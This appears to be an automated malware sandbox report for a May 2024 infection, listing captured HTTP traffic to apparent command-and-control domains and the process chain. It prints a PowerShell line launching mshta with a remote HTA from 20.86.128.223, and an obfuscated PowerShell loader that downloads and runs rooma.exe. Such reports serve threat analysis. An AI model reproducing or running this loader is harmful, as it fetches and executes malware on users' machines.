                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          41192.168.2.849754217.196.55.202803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:23:32.524965048 CEST1829OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.empowermedeco.com
                                                          Origin: http://www.empowermedeco.com
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1245
                                                          Referer: http://www.empowermedeco.com/fo8o/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 54 6b 50 42 6f 68 4a 79 66 57 61 6e 4e 6e 38 58 44 6b 54 76 7a 64 2f 49 65 32 6e 42 36 74 7a 51 4c 57 4b 61 6b 72 64 47 47 34 78 55 73 63 72 4b 41 54 48 37 53 44 6c 42 70 58 2b 39 48 73 46 75 43 6e 4a 53 48 68 41 67 54 68 49 79 76 52 2b 42 47 43 61 64 30 75 4c 6f 70 32 6c 41 6f 34 6d 4f 65 5a 6a 43 72 67 79 71 76 4c 71 5a 7a 4f 31 4f 5a 6e 37 68 75 36 4b 34 66 4a 2f 45 38 33 6d 73 46 76 45 61 79 51 6b 63 48 4c 39 78 42 44 7a 54 6a 52 77 43 4a 62 76 47 36 55 67 47 4c 4c 38 [TRUNCATED]
                                                          Data Ascii: Plm0mn68=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BwmuHZtneSNpCv6tdz/SqgFQJijCc6QAec+27kh/HHJKJVVVxqfXOqRITpjPZBKpY0vjE81+wjkgDciuPlRW3sW1GmsBtsOAhAhUOpmgRIE0WRvIkuiptJthjPlhlO+j5ZTkPBohJyfWanNn8XDkTvzd/Ie2nB6tzQLWKakrdGG4xUscrKATH7SDlBpX+9HsFuCnJSHhAgThIyvR+BGCad0uLop2lAo4mOeZjCrgyqvLqZzO1OZn7hu6K4fJ/E83msFvEayQkcHL9xBDzTjRwCJbvG6UgGLL803eV87ixRjkXYPl2e5FDOjxQX427zjUnUZjVjptuwgpmwelJA19UL29C3XJf4vPIK6ATY0nVxKPNo2ZzjLiViX0Lp0PW7XSxY1U4YA0Z66PFyBxtpQZSgNQ2s2AzdyARGRFQe8cDa88hWKqJV2mMu9tmqAVpMvkSRvUArVW2NVpnzKjcgTxL/DBRlNImMIR+PT5MHwmfjWkAmxFlylFlMITMd+IC5dMlVPpWwjCXq6MxTzordJMtM1S1atxylHNpC89wJPHHxA9/jk7BKjsoqhGy4hKY8gkVPa1Ry5hCKTNTo+Xfaggk4FqKXyjMXh4fZVmCfquVLKjKRiBHwaZOxv0pDRDEf5j4BsSFLNuegAfHZvNRJYWtd1iAQps3/1f3xqnul7yzHiVU2nJS13+cGfoe2A2H00Sip0z1K9LdNlXmYO1jJU4ywKdoo11/tgbCyh0BgPpMSRuNM7E6Rpt7UFs3/HUWJmJod0nnNHkIzP/Fo89HepAVZoKf5aICTQVNh3QuDpSObeygXbf8T7f0Ps3ZoPHkkJHq+hqVH73iQJi2v5PaVm9Ke5X+glmDm7rRrGUx5VUCzLfT2bPu0IOI3LPFquQrbyY2ceLAvqUtFB3s8dGp47rYLDA6r+vaPyeS3NN26l72FAcAKCO8B08iGExuVedxcwb2Yw [TRUNCATED]
                                                          May 23, 2024 20:23:33.092740059 CEST1070INHTTP/1.1 301 Moved Permanently
                                                          Connection: close
                                                          content-type: text/html
                                                          content-length: 795
                                                          date: Thu, 23 May 2024 18:23:33 GMT
                                                          server: LiteSpeed
                                                          location: https://www.empowermedeco.com/fo8o/
                                                          platform: hostinger
                                                          content-security-policy: upgrade-insecure-requests
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          42192.168.2.849755217.196.55.202803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:23:35.057065010 CEST523OUTGET /fo8o/?Plm0mn68=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfAZWzpPAGosIZrfQfUSvJErRFr5z6zwQDc//Mk8r+NzcRQ==&kzN4Y=k0xDPL HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Host: www.empowermedeco.com
                                                          Connection: close
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          May 23, 2024 20:23:35.621762991 CEST1225INHTTP/1.1 301 Moved Permanently
                                                          Connection: close
                                                          content-type: text/html
                                                          content-length: 795
                                                          date: Thu, 23 May 2024 18:23:35 GMT
                                                          server: LiteSpeed
                                                          location: https://www.empowermedeco.com/fo8o/?Plm0mn68=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfAZWzpPAGosIZrfQfUSvJErRFr5z6zwQDc//Mk8r+NzcRQ==&kzN4Y=k0xDPL
                                                          platform: hostinger
                                                          content-security-policy: upgrade-insecure-requests
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          43192.168.2.849756185.237.107.49803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:23:40.857038975 CEST771OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.joyesi.xyz
                                                          Origin: http://www.joyesi.xyz
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 209
                                                          Referer: http://www.joyesi.xyz/fo8o/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 31 68 42 4b 38 75 43 4f 6e 30 4f 36 45 57 36 79 7a 36 52 78 51 76 48 46 58 6a 46 4b 4e 55 49 66 68 37 2f 79 57 39 34 37 56 52 50 48 53 69 6e 73 73 69 62 2f 32 37 64 54 71 54 55 46 74 70 4d 36 76 53 76 45 4b 58 50 38 6d 75 7a 61 66 43 38 36 38 77 6c 53 72 36 62 49 6f 34 5a 69 36 77 4e 34 34 6b 67 39 6c 49 51 71 73 6e 71 65 71 6e 63 63 73 68 52 4c 42 78 38 69 5a 76 55 61 37 4f 5a 61 59 4a 42 36 31 53 72 35 63 76 46 37 46 45 4b 47 59 73 5a 51 56 44 38 48 6c 76 71 42 59 70 2b 69 48 45 41 72 48 6a 76 66 62 58 76 4c 79 53 77 50 52 2b 31 36 46 47 34 62 46 77 38 4b 48 6f 58 69 74 33 32 70 2b 79 77 3d
                                                          Data Ascii: Plm0mn68=1hBK8uCOn0O6EW6yz6RxQvHFXjFKNUIfh7/yW947VRPHSinssib/27dTqTUFtpM6vSvEKXP8muzafC868wlSr6bIo4Zi6wN44kg9lIQqsnqeqnccshRLBx8iZvUa7OZaYJB61Sr5cvF7FEKGYsZQVD8HlvqBYp+iHEArHjvfbXvLySwPR+16FG4bFw8KHoXit32p+yw=


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          44192.168.2.849757185.237.107.49803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:23:43.390125990 CEST791OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.joyesi.xyz
                                                          Origin: http://www.joyesi.xyz
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 229
                                                          Referer: http://www.joyesi.xyz/fo8o/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 31 68 42 4b 38 75 43 4f 6e 30 4f 36 48 31 69 79 30 5a 4a 78 56 50 48 47 53 6a 46 4b 62 6b 49 54 68 37 37 79 57 38 4e 6d 56 45 58 48 54 41 2f 73 74 6a 62 2f 78 37 64 54 79 6a 55 45 67 4a 4d 7a 76 53 54 4d 4b 58 7a 38 6d 75 33 61 66 44 4d 36 38 6a 4e 52 71 71 62 4f 6a 59 5a 67 6e 41 4e 34 34 6b 67 39 6c 49 46 2f 73 6e 43 65 70 54 67 63 74 45 74 49 66 68 38 68 51 50 55 61 77 75 5a 65 59 4a 42 55 31 54 6e 54 63 70 4a 37 46 42 4f 47 59 39 5a 54 4d 7a 38 42 76 50 72 57 62 71 75 74 48 7a 59 6e 4b 79 72 37 66 55 54 74 36 45 64 6c 4c 63 39 38 47 47 51 77 46 7a 55 38 43 66 4b 4b 33 55 6d 5a 67 6c 6c 42 46 30 59 68 6c 67 5a 6c 76 63 47 48 53 2b 42 43 79 73 7a 77
                                                          Data Ascii: Plm0mn68=1hBK8uCOn0O6H1iy0ZJxVPHGSjFKbkITh77yW8NmVEXHTA/stjb/x7dTyjUEgJMzvSTMKXz8mu3afDM68jNRqqbOjYZgnAN44kg9lIF/snCepTgctEtIfh8hQPUawuZeYJBU1TnTcpJ7FBOGY9ZTMz8BvPrWbqutHzYnKyr7fUTt6EdlLc98GGQwFzU8CfKK3UmZgllBF0YhlgZlvcGHS+BCyszw


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          45192.168.2.849758185.237.107.49803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:23:46.003093958 CEST1808OUTPOST /fo8o/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.joyesi.xyz
                                                          Origin: http://www.joyesi.xyz
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1245
                                                          Referer: http://www.joyesi.xyz/fo8o/
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                          Data Raw: 50 6c 6d 30 6d 6e 36 38 3d 31 68 42 4b 38 75 43 4f 6e 30 4f 36 48 31 69 79 30 5a 4a 78 56 50 48 47 53 6a 46 4b 62 6b 49 54 68 37 37 79 57 38 4e 6d 56 45 66 48 53 31 72 73 73 45 76 2f 77 37 64 54 73 54 55 42 67 4a 4e 6a 76 57 48 49 4b 58 2f 4b 6d 6f 72 61 51 42 45 36 70 69 4e 52 6b 71 62 4f 73 34 5a 68 36 77 4e 58 34 6b 77 35 6c 49 56 2f 73 6e 43 65 70 56 45 63 74 52 52 49 64 68 38 69 5a 76 55 4f 37 4f 5a 6d 59 4a 5a 69 31 54 7a 70 63 5a 70 37 46 68 65 47 65 50 68 54 54 44 38 44 73 50 72 65 62 71 6a 74 48 33 34 52 4b 79 66 46 66 55 72 74 73 6a 38 34 55 65 56 39 45 55 4d 78 4e 41 63 72 4c 50 71 34 32 45 71 4c 6c 6c 77 6a 4e 6a 30 35 6f 77 4a 4c 36 76 4c 45 4a 34 41 59 2f 35 65 62 53 4d 61 72 33 33 56 67 4d 52 5a 6e 6f 6f 67 6c 67 73 2f 71 6a 37 56 4d 66 6b 4f 35 54 77 79 34 36 57 32 4f 66 76 39 77 54 70 4d 77 30 7a 63 34 59 59 62 56 42 54 39 32 6d 53 61 42 6e 76 5a 75 39 78 4c 62 6a 4c 38 44 43 73 2f 35 43 69 50 35 64 52 63 61 66 64 79 68 72 32 6b 53 36 64 6e 55 42 4c 66 7a 75 35 34 45 4e 52 34 79 77 [TRUNCATED]
                                                          Data Ascii: Plm0mn68=1hBK8uCOn0O6H1iy0ZJxVPHGSjFKbkITh77yW8NmVEfHS1rssEv/w7dTsTUBgJNjvWHIKX/KmoraQBE6piNRkqbOs4Zh6wNX4kw5lIV/snCepVEctRRIdh8iZvUO7OZmYJZi1TzpcZp7FheGePhTTD8DsPrebqjtH34RKyfFfUrtsj84UeV9EUMxNAcrLPq42EqLllwjNj05owJL6vLEJ4AY/5ebSMar33VgMRZnooglgs/qj7VMfkO5Twy46W2Ofv9wTpMw0zc4YYbVBT92mSaBnvZu9xLbjL8DCs/5CiP5dRcafdyhr2kS6dnUBLfzu54ENR4ywbwOAbYc2t6eGuzgTWmSy9GYVJCcAYZADdopNd+sny2bu89wqeOPqtTRdkAl4dpL4fUOE62yD1/2uSyKRSsr8HJuevOZCGLp1NACg4YYZhehsgdua3s1jVsLEg+pLuW225HEt3GpnHoj1L2BXVSmlv2GJ5esOeUV01gOON01OaGaIOMJd0NIrfwanm9esi/rfmbxLJT3ED2Nz8K6BCwrn0PZpOI6/2YqMugsQy71dZ3KybQC8fJ5UjPdpbHeafA8BAZRhjN9XR8GhFfYiSe3p/+WtAHZbL+6iCMR4J73iG//o3QQdJwksMJtBGYXz2Ucv2TxBu2lOW/6SlcMUgnxJsAAogJdRzRf55ZVT1LVXJ1OhiWnk8AEFIQNj/JulRweyTPPuyaMZAL/xDpsBNKbIHQdvETD7Y/rEyBAjXzeYzPSRpcLNoqos7ZpXvhl/zvUUlUvoE6X6pY6EznRuQuJoFVxx7W3agaSntq7xPAV4x56vsB8ob5Bp89deQKrjNRGGcjqhhIzHUkNSeF6HDe/1+8IktQBJCD2vnbiseYoRBVRh1bSgmbCUiFTb5whCJIKeVxXzbXaRYHHWfJU1Vn/9muKAwf23Q65KWuRgkeEO3DvBVEGxiU828z16D808WVr1/QBs6/FANU/styCTgFOa4BtdUfuT0W5rb9 [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          46192.168.2.849759185.237.107.49803780C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 23, 2024 20:23:48.576845884 CEST516OUTGET /fo8o/?kzN4Y=k0xDPL&Plm0mn68=4jpq/azRsxa5RUjY86tNWfjSBjUfGmQA/bC5edk8IUrTRSqWoRPa/8wzulAZuqVnvDzKNkDL1IzsWztH+C0vz/DDu79arRp32UcJsNkv7g6dr0ICiHZvS3tESvUt5oYRbw== HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en
                                                          Host: www.joyesi.xyz
                                                          Connection: close
                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:1
                                                          Start time:14:20:09
                                                          Start date:23/05/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\W*\S*2\m*h?a.* 'http://20.86.128.223/room/room4.hta'
                                                          Imagebase:0x7ff6cb6b0000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:14:20:09
                                                          Start date:23/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:14:20:10
                                                          Start date:23/05/2024
                                                          Path:C:\Windows\System32\mshta.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\mshta.exe" http://20.86.128.223/room/room4.hta
                                                          Imagebase:0x7ff795ff0000
                                                          File size:14'848 bytes
                                                          MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:14:20:12
                                                          Start date:23/05/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs;
                                                          Imagebase:0x7ff6cb6b0000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:6
                                                          Start time:14:20:12
                                                          Start date:23/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:7
                                                          Start time:14:20:16
                                                          Start date:23/05/2024
                                                          Path:C:\Users\user\AppData\Roaming\rooma.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Roaming\rooma.exe"
                                                          Imagebase:0x9b0000
                                                          File size:270'848 bytes
                                                          MD5 hash:1DCCE19E1A6306424D073487AF821FF0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
